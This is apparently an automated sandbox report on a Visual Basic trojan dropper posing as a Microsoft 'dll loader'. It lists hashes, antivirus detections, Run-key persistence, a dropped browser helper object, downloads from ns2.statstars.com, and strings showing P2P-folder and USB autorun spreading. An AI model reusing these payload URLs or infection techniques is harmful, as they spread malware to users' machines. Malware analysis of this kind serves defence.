Analysis Date: 2015-01-14 13:54:55
MD5: a72a85524dfee36ab8da026e3dfef8a1
SHA1: b29a0c325e56324720bc25f103b2fbd0458a58af

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 75bdabe41caff64aca79b8b169e2737f sha1: de3af1659315e6799b9f2f4c9d761f1e1ecb353e size: 126976
Section: .data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section: .rsrc md5: 298ed959aebeabd6f68b6746feebd55a sha1: 288a6ca919d17ee388633ac0629ef78542692fc9 size: 524288
Timestamp: 2010-01-20 21:38:37
Pdb path: @
Version:
LegalCopyright: microsoft compiler
InternalName: Setup
FileVersion: 1.02.0057
CompanyName: microsoft
Comments: microsoft
ProductName: microsoft dll loader
ProductVersion: 1.02.0057
FileDescription: dll loader
OriginalFilename: Setup.exe
Packer: Microsoft Visual Basic v5.0
PEhash: 01dd63e9eb635797114d8796c674c7f42c0a99f8
IMPhash: f443df703e310dc5ad431cb600d66524
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.Generic.6634916
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Trojan.Generic.6634916:Trojan.Generic.6140234:Trojan.Generic.8006684
AV Authentium: W32/VB.AF.gen!Eldorado
AV Avira (antivir): TR/Dropper.Gen
AV BullGuard: Trojan.Generic.6634916
AV CA (E-Trust Ino): Win32/Tnega.ACPU
AV CAT (quickheal): I-Worm.VB.jg.n3
AV ClamAV: Trojan.Agent-298260
AV Dr. Web: BackDoor.Siggen.32811
AV Emsisoft: Trojan.Generic.6634916
AV Eset (nod32): Win32/AutoRun.VB.VP worm
AV Fortinet: W32/Autorun.VB!tr
AV Frisk (f-prot): W32/VB.AF.gen!Eldorado
AV F-Secure: Trojan.Generic.6634916
AV Grisoft (avg): Generic16.BFBN
AV Ikarus: Trojan.Win32.Mepaow
AV K7: Backdoor ( 04c4da2a1 )
AV Kaspersky: Trojan-Dropper.Win32.Agent.ntyn
AV MalwareBytes: Trojan.P2P.Downloader
AV Mcafee: Generic.dx!C0213B456727
AV Microsoft Security Essentials: TrojanDownloader:Win32/Tonick
AV MicroWorld (escan): Trojan.Generic.6634916
AV Rising: Trojan.Win32.Generic.11E9E69C
AV Sophos: Mal/VB-BZ
AV Symantec: Downloader
AV Trend Micro: Possible_Otorun8
AV VirusBlokAda (vba32): OScope.Trojan.VB.01381

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\VB and VBA Program Settings\tob\x\x ➝ x\\x00
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\xxxc.bat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\instal\key.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\zip.zip
Creates File: C:\WINDOWS\system32\vbzip11.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\instal\readm.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\tmp3.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\micka.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\instal\Install.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\instal\Install.exe
Creates Process: regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\tmp3.dll"
Creates Process: regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"
Creates Process: regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"
Creates Process: regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\micka.exe
Creates Process: regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"
Creates Process: regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"
Creates Process: C:\Program Files\Ares\Ares.exe
Creates Process: regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"
Creates Process: regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"
Creates Process: regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"
Winsock URL: http://ns2.statstars.com/zip.zip
Winsock URL: http://ns2.statstars.com/main1.gif
Winsock URL: http://google.com

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\tmp3.dll"

Registry: HKEY_CLASSES_ROOT\CLSID\{D5B72AED-E54A-11D6-B1B2-444553540000}\ ➝ BrowserHelper.CBrowserHelper\\x00
Registry: HKEY_CLASSES_ROOT\BrowserHelper.CBrowserHelper\ ➝ BrowserHelper.CBrowserHelper\\x00
Registry: HKEY_CLASSES_ROOT\Interface\{0557B73E-F61E-475E-A5C9-1E748F078467}\ ➝ CBrowserHelper\\x00

Process
↳ regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"

Process
↳ C:\Program Files\Ares\Ares.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\micka.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scs1.tmp
Creates File: C:\WINDOWS\TEMP\scs2.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\MICKA.EXE
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes File: C:\WINDOWS\TEMP\scs1.tmp
Deletes File: C:\WINDOWS\TEMP\scs2.tmp

Network Details:

DNS: google.com
Type: A
173.194.125.64
DNS: google.com
Type: A
173.194.125.78
DNS: google.com
Type: A
173.194.125.73
DNS: google.com
Type: A
173.194.125.72
DNS: google.com
Type: A
173.194.125.71
DNS: google.com
Type: A
173.194.125.70
DNS: google.com
Type: A
173.194.125.69
DNS: google.com
Type: A
173.194.125.68
DNS: google.com
Type: A
173.194.125.67
DNS: google.com
Type: A
173.194.125.66
DNS: google.com
Type: A
173.194.125.65
DNS: ns2.statstars.com
Type: A
184.168.221.96
HTTP GET: http://google.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://ns2.statstars.com/zip.zip
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://ns2.statstars.com/main1.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP: 192.168.1.1:1031 ➝ 173.194.125.64:80
Flows TCP: 192.168.1.1:1032 ➝ 184.168.221.96:80
Flows TCP: 192.168.1.1:1033 ➝ 184.168.221.96:80

Raw Pcap

Strings
040904B0
040904E4
1.00.0013
1.02.0057
'12,%";
1s%P
2000
2003
21qeqe234-234eqe34-5qeqe5892-4sasw2
</a>
Abrir
Abrir USB
*\AC:\Documents and Settings\tonck\Desktop\BHO Sample\BrowserHelper.vbp
action
AddFileSpec
\AppData\Local\Ares\My Shared Folder\
\AppData\Local\Ares\My Shared Folder\incompletes\
\AppData\Local\eMule\config\preferences.ini
\AppData\Roaming\frostwire\frostwire.props
\AppData\Roaming\LimeWire\limewire.props
\Application Data\frostwire\frostwire.props
\Application Data\LimeWire\limewire.props
\Ares\Ares.exe
Ares.exe
asdasd
asdasd.exe
</a></th>
Autoconnect=0
Autoconnect=1
AUTORUN
\Autorun.inf
Autorun.inf
B*\AC:\Documents and Settings\tonck\Desktop\PP22PPlast\Project1.vbp
BasePath
base.zip
blank">
BrowserHelper
BrowserHelper.dll
bsJP2
class="BlckUnd">
ClearFileSpecs
Comments
CompanyName
CopyFileW
CURSOR
Del 
DIRECTORIES_TO_SEARCH_FOR_FILES
dll loader
\Documents\Shareaza Downloads\
\Documents\Shareaza Downloads\incompletes\
\Downloads\eMule\Incoming\
\emule\config\preferences.ini
\emule\emule.exe
emule.exe
\eMule\Incoming\
Error
.exe
FileDescription
FileVersion
final.exe,Shareaza.exe,emule.exe,Frostwire.exe,LimeWire.exe,Ares.exe,bla.exe
folderexists
FrostWire
Frostwire.exe
\frostwire\Frostwire.exe
         (((((                  H
Header
HKEY_
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_DYN_DATA
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D5B72AED-E54A-11D6-B1B2-444553540000}
HKEY_PERFORMANCE_DATA
HKEY_USERS
HOMEDRIVE
html
.html
http://apps.katz.cd/pg/--PAGE--
http://btjunkie.org/browse/Games/page
http://btjunkie.org/browse/Software/page
http://games.katz.cd/pg/1
http://games.katz.cd//pg/--PAGE--
http://google.com
http://ns2.statstars.com/main1.gif
http://ns2.statstars.com/test.gif
http://ns2.statstars.com/zip.zip
http://www.fullversions.org/crack-serial-keygen-torrent-free-full-download-App---PAGE--
http://www.fullversions.org/crack-serial-keygen-torrent-free-full-download-Game---PAGE--
http://www.newcracks.net/
http://www.phazeddl.com/pg/apps--PAGE--
http://www.phazeddl.com/pg/games--PAGE--
icon
_IID_CBROWSERHELPER
IIF]ZERZ[OEXR[\UCN@[SB@YK_GQt}mORMEPyqNFME\_qmZBCW]@cSEKPUU`oKQ
IIF]ZJHKHFTALMGY_WOGZPCOXH^@Pw|RNQLBQzpAGND[^rlEC@VZA`RJJSTRalJ.
IncomingDir
incomplete
incompletes\
Info-ZIP
Info-ZIP 1997
Info-ZIP's WiZ
Info-ZIP's Zip dll
inot.zip
\instal
\instal\
\instal\Install.exe
\instal\key.txt
\instal\readm.txt
InternalName
@isual Studio\VB98\C2
jjjj
jjjjjj
jjjjjjjjj
Js2P
kernel32
LegalCopyright
LimeWire
LimeWire.exe
\LimeWire\LimeWire.exe
\Local Settings\Application Data\Ares\My Shared Folder\
\Local Settings\Application Data\Ares\My Shared Folder\incompletes\
micka
\micka.exe
microsoft
microsoft compiler
microsoft dll loader
money money money,must be funny
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
msdto.exe
\My Documents\Shareaza Downloads\
\My Documents\Shareaza Downloads\incompletes\
(null)
OLESelfRegister
open
OriginalFilename
--PAGE--
--PAGE--/?o=52&t=0
--PAGE--/?o=72&t=0&s=1
ping; 1.2; 0.3; 0.4 - n; 1 - w; 500 > nul
please re-download the application
ProductName
ProductVersion
ProgramFiles
PROGRAMFILES
RecurseSubDirs
regsvr32.exe /s "
regwrite
Scripting.FileSystemObject
Setup
Setup.exe
Shareaza.exe
\Shareaza\Shareaza.exe
shell32
ShellExecuteW
shell\open
shell\open\command
shell\open\Default
ssPP
StoreFolderNames
StringFileInfo
system
%SystemRoot%\system32\SHELL32.dll,7
Temp
Text
The Device was not found!
\tmp-3\
\tmp3.dll
\tmp-3\msdto.exe
Translation
TYPELIB
Unknown
UONET SYSTEM
UseAutoPlay
USERPROFILE
VarFileInfo
\vbzip11.dll
Vista
VS_VERSION_INFO
\xxxc.bat
xxxc.bat
.zip
Zip32
ZIP32.DLL
ZipFile
\zip.zip
abnormal program termination
ABQ@RP
:Ac@wc@
AddFileSpec
  adding: %s
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
adjusting offsets for
AdjustTokenPrivileges
advapi32.dll
ADVAPI32.dll
alldatax
_allmul
allocating temp filename
AllowAppend
america
american
american english
american-english
:(=a=m=s=
>A?N?W?
Appending
Argentina
asdasd
A=Tj3TE
attempting to restore %s to its previous state
August
Australia
australian
Austria
>A?U?u?
B 02CV
bad extended local header for 
bad pack level
BasePath
Basque
>b'~b(
BBBp;;;>
bCancel
belgian
Belgium
:&;b;g;~;
:!:=:B:H:L:h:
=B=H=T=d=k=r=x=
==>B>[>i>
:#:B:J:c:l:
block vanished
>!>(>B>]>l>r>x>
=!=B=O=f=l=z=
britain
BrowserHelper
BrowserHelper.dll
bState
btHHt.
;$<*<C<
C =02CVu
c2.c3>c4Nc
CallWindowProcA
Canada
canadian
Cancel
cannot repeat names in zip file
can only have one -P
can only have one -t
can only have one -tt
can't rewrite method
can't use - and -@ together
can't use -d,-f,-u or -g on stdout
can't use -F with -A, -F ignored
can't use -T on stdout, -T ignored
can't use -y with -k, -y ignored
CBrowserHelper
_CBrowserHelperWd
:c:.;d;|;
C:\Documents and Settings\tonck\Desktop\asdasd.pdb
C:\Documents and Settings\tonck\Desktop\Setup.pdb
central 
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
ClearFileSpecs
CloseHandle
Colombia
Command1
Command2
Comment
CompareStringA
CompareStringW
 compressed size %ld, actual size %ld for %s
Compression
ConvertCRLFToLF
ConvertLFToCRLF
CopyFileA
Costa Rica
Could not create output file
could not open for reading: 
could not read input file: 
cP8!D*
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
CreateFileA
CreateMutexA
CreateRandomLetter
CreateToolhelp32Snapshot
CRLF-LF
>Cu28V
C:\WINDOWS\system32\ieframe.dll\1
C:\WINDOWS\system32\msvbvm60.dll\3
<=<d<	=
>'>d>}>
D$4j*P
da^ff^ebNf1
`.data
@.data
dC.dD>dENdF^dGndH~
dc{odadm
dddd, MMMM dd, yyyy
DDDI{{{
December
 (deflated %d%%)
Delete
DeleteCriticalSection
DeleteFileA
deleting directory %s (if empty)                
deleting: %s
:<;@;D;H;L;l;p;t;x;|;
?;?D?I?X?a?h?m?
DllCanUnloadNow
DllFunctionCall
DllGetClassObject
DllRegisterServer
DllUnregisterServer
DOMAIN error
Dominican Republic
do not specify both -r and -R
dOve_vfo
?,?<?D?T?d?l?t?x?|?
dutch-belgian
D$ VSj
;^<d<x<~<
:!:>:D:y:
Ea|9\L)8L=5
Ecuador
eeeeeeeee
eLevel
empty name without -j or -r
Encrpyt
Encrypt
england
English
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
Enter comment for %s:
EnterCriticalSection
Enter password: 
Entry too big to split
EnumSystemLocalesA
eR.eS>eTNeU
error deleting 
:!:&:,:<:E:S:]:b:
EVENT_SINK2_AddRef
EVENT_SINK2_Release
EVENT_SINK_AddRef
EVENT_SINK_GetIDsOfNames
EVENT_SINK_Invoke
EVENT_SINK_QueryInterface
EVENT_SINK_Release
excluding %s
ExitProcess
extended local header not found for 
fcaacopefm
 fcopy: write error
fCXwvoww
f;D$<t
February
ff&fc>Z
FFF#LLL
file and directory with the same name: 
file matches zip file -- skipping
File not found or no read permission
FileSpec
FileSpecCount
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindNextFileA
findos
FindWindowA
Finland
Finnish
  first full name: 
F@j@Ph
- floating point not loaded
FlushFileBuffers
FmoBrowser_BeforeNavigate2
FNNNN@
; ;/;>;F;N;T;\;a;j;p;v;
Force DOS
fOsbrRs
F PjPWj
F$PjQWj
F.PjRWj
F*PjTWj
F+PjUWj
F,PjVWj
F-PjWWj
\FqKZV2
France
FreeEnvironmentStringsA
FreeEnvironmentStringsW
French
french-belgian
french-canadian
french-luxembourg
french-swiss
Freshen
FreshenFiles
freshening: %s
Friday
fstat(stdin)
German
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetCurrentThreadId
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileInformationByHandle
GetFileTime
GetFileType
GetFullPathNameA
GetKernelObjectSecurity
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocaleInfoW
GetLocalTime
GetLogicalDriveStringsA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetParent
GetProcAddress
GetProcessHeap
GetSecurityDescriptorLength
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemDirectoryA
GetSystemTime
GetTimeZoneInformation
GetUserDefaultLCID
GetVersion
GetVersionExA
GetVolumeInformationA
GetWindow
GetWindowThreadProcessId
GIF89a
GlobalAlloc
GlobalFree
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalUnlock
?&?G?\?n?
>G>P>U>f>k>u>
great britain
Guatemala
`h````
H4Q4]4n4~4
has been
Headers
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HHtpHHtl
H:mm:ss
holland
hong-kong
hPs)uPsP
HSUVWh
< <:<I<
Iceland
Icelandic
ifexeruning
IFthere
#%iIMzR
IncludeSystemAndHiddenFiles
incorrect compressed size
InitializeCriticalSection
	(in=%lu) (out=%lu)
Input file read failure
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
Internal logic error
InternetCheckConnectionA
InternetCloseHandle
InternetOpenA
InternetOpenUrlA
InternetReadFile
Interrupted
Invalid command arguments
Invalid comment format
invalid date entered for -t option
invalid date entered for -tt option
invalid option(s) used with -d; ignored.
invalid path
invalid time
IObjectWithSite
IObjectWithSite_GetSite
IObjectWithSite_SetSite
irish-english
IsValidCodePage
IsValidLocale
italian-swiss
It[IItM
j0hTq@
}#j8h(G@
}#j8hhH@
JanFebMarAprMayJunJulAugSepOctNovDec
January
}#jdh0J@
}#jdhhK@
;J;e;u;{;
}#j\h0J@
}#j|hHG@
}#jhhHG@
jhhHG@
}#j\hhK@
jHhTq@
j$hTq@
JJJ2bjo
JJJ2HHHEEEEHHHHxHHH
JJJ2JJJ
}#jPhHG@
jPhHG@
jPhTq@
jPsEjPsZ]Os
}#jTh0N@
}#jTh\E@
Junk Dir Names
Junk SFX
} jXh\E@
}#jXhHG@
jXhTq@
;@<J<Z<
:$;<;K;];
Kernel32
KERNEL32.dll
killproces
 KKKby
KKK!FFF#R_g
KKK!HHHDEEEGEEEYHHH
KKK!HHHDEEEGGGGhHHH
k<PdAfv
<,<k<q<
kRspuRs
:Ksf9Ks{7Ks
L0N5Yd
l$0VWPU
L1T1X1\1d1h1t1|1
Label1
Label2
Label3
LC_ALL
LC_COLLATE
LC_CTYPE
LCMapStringA
LCMapStringW
LC_MONETARY
LC_NUMERIC
lCount
LC_TIME
 (%ld bytes security)
LeaveCriticalSection
LF-CRLF
LoadLibraryA
local 
local and central headers differ for 
local extra (%ld bytes) != central extra (%ld bytes): 
LocalFileTimeToFileTime
local flags = 0x%04x, central = 0x%04x: 
local header not found for 
LookupPrivilegeValueA
LosterMurdoc is r0x
=(=-=L=P=X=e=p=u=
:?;L;q;
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
>$>,><>L>T>d>t>|>
-l used on binary file
Luxembourg
;(;L;V;\;l;
;-;:;M;
made by version %d.%d on system type %d: 
mainrutine
Making argv
M/d/yy
MeCZha
MessageBoxA
MessageLevel
Mexico
microsoft
microsoft dll loader
Microsoft Visual C++ Runtime Library
missing argument for -b or -P
missing end signature--probably not a zip file (did you
missing or early
Missing or empty zip file
missing suffix list
***;mmm
MmuBrowser
moBrowser
Module1
Monday
MoveFileA
MSVBVM60.DLL
__MSVCRT_HEAP_SELECT
MultiByteToWideChar
multiple disk information ignored
name in zip file repeated: 
name lengths in local and central differ for 
name not matched: 
names in local and central differ for 
needs unzip %d.%d on system type %d: 
new-zealand
new zip file left as: 
nIndex
$}	nL	
NLPQhT
No Dir Entries
norwegian
norwegian-bokmal
norwegian-nynorsk
no such option: %c
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
 not found or empty
Nothing to do!
nothing to select from
November
November 29th 1999
nRs*aQs
nRs*aQs?|Ps
Ns1hRs
Ns1hRsf
NsbrRs
NsEjPs
Ns$FPs
Ns];Os
(null)
oC:\Documents and Settings\tonck\Desktop\BHO Sample\Vbshell.tlb
October
Offsets
 offset %u--local = %02x, central = %02x
:O:h:p:
OpenProcess
OpenProcessToken
Os0jPs
OsDROsk
OsEtPs
OsfLPs
Os mPs
?Os?|Ps*<Rs
?Os*<Rs
OssnPs0sRs
Os@sRs
OstLPs"
Os)uPs
Os"UPs
Out of memory
output buffer too small for in-memory compression
Output file write failure
>>>P,,,
Panama
Paraguay
PasswordRequest
password verification failed
pblnUpperCase
PeekNamedPipe
 PhTx@
Picture1
!!!pMMM
portuguese-brazilian
PostData
PPPPPPPP
ppvObj
ppxxxx
;`<p<Q=f=
PQhdY@
PQhxT@
pr china
pr-china
Privileges
Process32First
Process32Next
Program: 
<program name unknown>
Progress
Ps0jPs
Ps2uQs
PsC;Ks
PsDROsk
PsfzPs
PstjPs
Ps>UPs
puerto-rico
- pure virtual function call
pwwwww
pwwwwwx
=.=<=Q=
>Q?^?h?p?z?
Qkkbal
qPs_]Qs
qqqqqqqq
QQSUVWj
QQSVW3
QQSVWj
Qs@9Rs
Qs*aQs
Qs&nPsI
Qs];Os~
QstjPs
QswUPs'kPs7
`.rdata
ReadFile
Recurse -r
Recurse -R
RecurseSubDirs
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
registry
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseMutex
@.reloc
remember to use binary mode when you transferred it?)
RemoveDirectoryA
Repair
 replace: can't open %s
Retry with option -qF to truncate, with -FF to attempt full recovery
RPhdY@
RPhxq@
RRPQj	
Rs|sQs%
:Rs\TPs
RtlMoveMemory
RtlUnwind
runtime error 
Runtime Error!
%s: adjusting offsets for a preamble of %lu bytes
Saturday
sBasePath
sBrowserHelperWWW
SeBackupPrivilege
 second full name: 
September
SeSecurityPrivilege
SetCurrentDirectoryA
SetEndOfFile
SetEnvironmentVariableA
SetFileAttributesA
SetFilePointer
SetFileTime
SetHandleCount
SetLastError
SetStdHandle
SetWindowLongA
sFilename
SHDocVw
shell32.dll
ShellExecuteA
ShowWindow
SING error
 s=%ld, actual=%ld 
SleepEx
slovak
south africa
south-africa
South Africa
south korea
south-korea
Spanish
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
Spanish - Modern Sort
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
Spanish - Traditional Sort
spanish-uruguay
spanish-venezuela
sPassword
specify just one action
spread
=sRIObjectWithSite
%s: %s a preamble of %lu bytes
SS@SSPVSS
starts on disk %u: 
stdole2.tlbWWW
 (stored 0%%)
StoreDirectories
StoreFolderNames
StoreVolumeLabel
strPath
Sunday
SunMonTueWedThuFriSat
S?uTOuU_uVouW
SUVWhX
Sweden
Swedish
swedish-finland
Switzerland
\$$SWV
System
SystemTimeToFileTime
t$0Fj/V
<:t0<;t,
target buffer too small
TargetFrameName
>T>b>v>
tEj@Vh
Temp dir switch command
Temporary directory
Temporary file failure
TerminateProcess
Text10
<]t_G<-uA
!This program cannot be run in DOS mode.
!This progrVB5!
Thursday
Timer1
Timer2
Timer3
Timer4
</tK<:tG<\tC
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
total bytes=%lu, compressed=%lu -> %d%% savings
T$ QPRW
T$$QRW
tried to write binary zipfile data to console!
trinidad & tobago
T$<RUV
t$ SRV
t#SSUP
<?t#<*t
t.;t$$t(
</t~<\tz
Tuesday
TUW}H@
t$$VSS
t$ WVjP
t/WWUPj
$ < u	
>:u#FV
uL9|$$t
Unable to allocate memory in zip dll
Unable to allocate memory in zip library at %s
- unable to initialize heap
- unable to open console device
undefined bits used in flags = 0x%04x: 
Unexpected end of zip file
unexpected error on zip file
- unexpected heap error
- unexpected multithread lock error
>:uNFV
united-kingdom
united-states
unknown compression method %u: 
unknown internal attributes = 0x%04x: 
Update
UpdateOnlyIfNewer
updating: %s
up to date
uRs_]Qs
Uruguay
use -b before zip file name
use -P before zip file name
user32
user32.dll
USER32.dll
User terminated operation
use -x or -i after name of zipfile
***;uuu
VBA6.DLL
__vbaAptOffset
__vbaAryConstruct2
__vbaAryCopy
__vbaAryDestruct
__vbaAryLock
__vbaAryMove
__vbaAryUnlock
__vbaAryVar
__vbaBoolVarNull
__vbaCastObj
__vbaChkstk
__vbaCopyBytes
__vbaEnd
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaExitProc
__vbaFailedFriend
__vbaFileClose
__vbaFileOpen
__vbaFixstrConstruct
__vbaFPException
__vbaFpI4
__vbaFPInt
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaGet3
__vbaGosub
__vbaGosubFree
__vbaGosubReturn
__vbaHresultCheckObj
__vbaI2Abs
__vbaI2I4
__vbaI2Var
__vbaI4Var
__vbaInStr
__vbaInStrB
__vbaInStrVar
__vbaLateMemCall
__vbaLbound
__vbaLenBstr
__vbaLenBstrB
__vbaLineInputStr
__vbaLineInputVar
__vbaLsetFixstr
__vbaMidStmtBstr
__vbaNew
__vbaNew2
__vbaObjIs
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaPrintFile
__vbaPut3
__vbaPut4
__vbaPutOwner3
__vbaR8Var
__vbaRaiseEvent
__vbaRecAnsiToUni
__vbaRecDestruct
__vbaRecDestructAnsi
__vbaRecUniToAnsi
__vbaRedim
__vbaRedimPreserve
__vbaRefVarAry
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrFixstr
__vbaStrI2
__vbaStrI4
__vbaStrMove
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarCopy
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaUI1I2
__vbaUI1Str
__vbaVar2Vec
__vbaVarAdd
__vbaVarCat
__vbaVarCmpEq
__vbaVarCopy
__vbaVarDup
__vbaVargVarCopy
__vbaVargVarMove
__vbaVarIndexLoad
__vbaVarLateMemCallLd
__vbaVarLateMemSt
__vbaVarMove
__vbaVarOr
__vbaVarSetObj
__vbaVarSetVar
__vbaVarTstEq
__vbaVarTstGt
__vbaVarVargNofree
__vbaVarZero
VBShellLib
Vbshell.tlbWWW
vBWSSSj
vbzip11.dll
VC20XC00U
Venezuela
Verbose
Verdana
Verify password: 
VirtualAlloc
VirtualFree
Volume
Vtvj0j
VXw[Q/
WaitForSingleObject
was adding files to zip file
was copying %s
was creating pattern list
was deleting moved files and directories
was getting encryption password
was processing arguments
was processing list of files
was reading comment lines
was replacing the original zip file
was setting comments to null
was verifying encryption password
was zipping %s
Wednesday
WideCharToMultiByte
will just copy entry over: 
wininet
wininet.dll
wiz.exe
would be
WQj1Pj
write error on zip file
WriteFile
WritePrivateProfileStringA
;);W;s;
WSPVQR
wvsprintfA
wwwwww
wwwwwwp
wwwwwww
wwwwwwww
wwwwwwwww
wwwwwwwwwwp
wwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwx
wwwwwxp
wwwxxw
_^][YY
:	;Z;e;
zero-length name for entry #
zero length password not allowed
zip -0 not supported for I/O on pipes or devices
ZIP32.dll
zip diagnostic: deleting file %s
zip diagnostic: GetFileAttributes failed
zip diagnostic: GetVolumeInformation failed
zip diagnostic: %scluding %s
zip diagnostic: %s %s
zip error: %s (%s)
ZipFile
zip file empty
zip file has only directories, can't make it as old as latest entry
Zip file invalid or could not spawn unzip
zip file is empty, can't make it as old as latest entry
Zip file name
Zip file structure invalid
zip info: %s has %ld bytes of %sextra data
	zip info: %s%s
zip I/O error
zip: reading %s
zip warning
	zip warning: %s%s
zip warning: %s %s truncated.
ziXXXXXX
Zombie_GetTypeInfo
Zombie_GetTypeInfoCount
ZpArchive
ZpGetOptions
ZpInit
ZpSetOptions
ZpVersion
zu^SSS
ZVlE)m
.Z:.zip:.zoo:.arc:.lzh:.arj